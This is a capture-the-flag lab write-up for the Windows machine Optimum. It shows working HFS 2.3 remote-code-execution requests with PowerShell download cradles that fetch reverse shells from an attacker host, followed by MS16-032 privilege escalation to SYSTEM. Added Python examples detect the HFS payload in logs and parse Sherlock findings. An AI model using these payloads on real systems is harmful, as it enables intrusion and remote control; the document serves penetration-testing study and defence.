This machine runs Windows. You have to be very careful with encoding; that is why it was not working for me at first.
As always, we start with an Nmap scan.
root@Kali2:~/Downloads# nmap -sC -sV -O 10.10.10.8
Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-02 19:42 CET
Nmap scan report for 10.10.10.8
Host is up (0.024s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
We can see it is running HttpFileServer httpd 2.3. A quick Google search shows that its search function has a vulnerability triggered with a null byte. So if we send
GET /?search=%2500{.exec|ping+10.10.14.6} HTTP/1.1
we receive a ping
root@Kali2:~/Desktop# tcpdump -i tun0
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
19:55:00.648169 IP Kali2.55208 > 10.10.10.8.http: Flags [S], seq 311197498, win 29200, options [mss 1460,sackOK,TS val 2554504713 ecr 0,nop,wscale 7], length 0
19:55:00.672238 IP 10.10.10.8.http > Kali2.55208: Flags [S.], seq 565428027, ack 311197499, win 8192, options [mss 1357,nop,wscale 8,sackOK,TS val 83371 ecr 2554504713], length 0
We can execute a PowerShell command (it has to be URL encoded) to launch a nishang reverse shell
GET /?search=%00{.exec|c:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.6:8000/powershellreverse2.ps1').} HTTP/1.1
Host: 10.10.10.8
And that gives us a shell
root@Kali2:~/Desktop# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.8] 49162
Windows PowerShell running as user kostas on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\kostas\Desktop>whoami
Optimum\kostas
PS C:\Users\kostas\Desktop> systeminfo

Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00252-70000-00000-AA535
Original Install Date:     18/3/2017, 1:51:36 ??
System Boot Time:          9/11/2019, 6:58:56 ??
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest
Total Physical Memory:     4.095 MB
Available Physical Memory: 3.275 MB
Virtual Memory: Max Size:  5.503 MB
Virtual Memory: Available: 4.706 MB
Virtual Memory: In Use:    797 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 31 Hotfix(s) Installed.
                           [01]: KB2959936  [02]: KB2896496  [03]: KB2919355  [04]: KB2920189
                           [05]: KB2928120  [06]: KB2931358  [07]: KB2931366  [08]: KB2933826
                           [09]: KB2938772  [10]: KB2949621  [11]: KB2954879  [12]: KB2958262
                           [13]: KB2958263  [14]: KB2961072  [15]: KB2965500  [16]: KB2966407
                           [17]: KB2967917  [18]: KB2971203  [19]: KB2971850  [20]: KB2973351
                           [21]: KB2973448  [22]: KB2975061  [23]: KB2976627  [24]: KB2977629
                           [25]: KB2981580  [26]: KB2987107  [27]: KB2989647  [28]: KB2998527
                           [29]: KB3000850  [30]: KB3003057  [31]: KB3014442
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.8
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
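The two requests above (the ping check and the PowerShell download cradle) share one signature: a search parameter carrying a null byte, single- or double-encoded, followed by an HFS {.macro.} body. What follows is an added detection example, not code from the original write-up; the log lines are constructed in a generic access-log layout (HFS's own log format is not assumed) and reuse the addresses from the write-up.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed sample log in a generic access-log layout (not HFS's native log
# format): the two requests from the write-up plus two benign search/download hits.
SAMPLE_LOG = "\n".join([
    r"""10.10.14.6 - - [02/Nov/2019:19:55:00 +0100] "GET /?search=%2500{.exec|ping+10.10.14.6} HTTP/1.1" 200 512""",
    r"""10.10.14.6 - - [02/Nov/2019:19:58:12 +0100] "GET /?search=%00{.exec|c:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe+IEX(New-Object+Net.WebClient).downloadString('http://10.10.14.6:8000/powershellreverse2.ps1').} HTTP/1.1" 200 512""",
    r"""10.10.14.7 - - [02/Nov/2019:20:01:03 +0100] "GET /?search=report.pdf HTTP/1.1" 200 2048""",
    r"""10.10.14.7 - - [02/Nov/2019:20:01:09 +0100] "GET /files/report.pdf HTTP/1.1" 200 90210""",
])

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
MACRO_RE = re.compile(r"\{\.\s*(?P<macro>[a-z]+)")  # HFS macro opener: {.name|args.}


def decode_search(target: str) -> Optional[str]:
    """Return the fully decoded search parameter, or None if the request has none.
    Decoding runs twice on purpose: %2500 survives one pass as %00, which is the
    double-encoding variant used in the first request of the write-up."""
    if "?search=" not in target:
        return None
    raw = target.split("?search=", 1)[1].split("&", 1)[0]
    return unquote(unquote(raw))


def classify(line: str) -> Optional[Dict[str, object]]:
    """One finding per suspicious log line; None when the search looks benign."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    search = decode_search(m.group("target"))
    if search is None:
        return None
    macro = MACRO_RE.search(search)
    has_null = "\x00" in search
    if not macro and not has_null:
        return None
    return {
        "source": line.split(" ", 1)[0],
        "null_byte": has_null,                             # the filter-bypass byte
        "macro": macro.group("macro") if macro else None,  # e.g. "exec"
    }


def scan(log: str) -> List[Dict[str, object]]:
    """Run classify over every line and keep only the findings."""
    return [f for f in (classify(line) for line in log.splitlines()) if f]
```

Either indicator on its own is worth an alert: a literal null byte never belongs in a legitimate search term, and a {.macro.} body in user input is the code-execution primitive itself.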
After that we can run Sherlock
PS C:\Users\kostas\Desktop> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8001/SherlockAllchecks.ps1')

Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Appears Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable
Sherlock shows us vulnerabilities that can be exploited with Empire.
We download the exploit from
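As an added example (not part of the write-up, and not Sherlock's own code), here is a parser that turns Sherlock's output into a patch-gap list, keeping only the bulletins it reports as "Appears Vulnerable"; it also accepts output that has been flattened onto a single line, as often happens when it is pasted. The sample records are three of the findings shown above.

```python
import re
from typing import Dict, List

# Constructed excerpt in Sherlock's record format (three findings taken from the output above).
SHERLOCK_OUTPUT = """
Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable
"""

# One record = the five fields Sherlock prints, always in this order. Lazy matches
# plus DOTALL let the same pattern read line-per-field output or output pasted flat.
RECORD_RE = re.compile(
    r"Title\s*:\s*(?P<title>.*?)\s*"
    r"MSBulletin\s*:\s*(?P<bulletin>.*?)\s*"
    r"CVEID\s*:\s*(?P<cves>.*?)\s*"
    r"Link\s*:\s*(?P<link>.*?)\s*"
    r"VulnStatus\s*:\s*(?P<status>.*?)\s*(?=Title\s*:|\Z)",
    re.DOTALL,
)


def parse_sherlock(text: str) -> List[Dict[str, str]]:
    """Every finding as a dict with keys title, bulletin, cves, link, status."""
    return [m.groupdict() for m in RECORD_RE.finditer(text)]


def patch_gaps(text: str) -> List[dict]:
    """Only the findings Sherlock marks 'Appears Vulnerable', with the CVE ids split
    into a list so they can be cross-checked against the host's installed hotfixes."""
    gaps = []
    for rec in parse_sherlock(text):
        if rec["status"].lower().startswith("appears vulnerable"):
            rec["cves"] = [c.strip() for c in rec["cves"].split(",")]
            gaps.append(rec)
    return gaps
```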
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16032.ps1
and add this line to it (to launch another nishang shell)
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.9:8001/powershellreverse3.ps1')"
PS C:\Users\kostas\Desktop> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8001/MS16032.ps1')
[ASCII art banner]
[by b33f -> @FuzzySec]
[!] Holy handle leak Batman, we have a SYSTEM shell!!
If we listen with nc
root@Kali2:~/Desktop# nc -nlvp 668
listening on [any] 668 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.8] 49173
Windows PowerShell running as user OPTIMUM$ on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\kostas\Desktop>whoami
nt authority\system
Done. The first time I did it with Metasploit; this time it was with much less help 🙂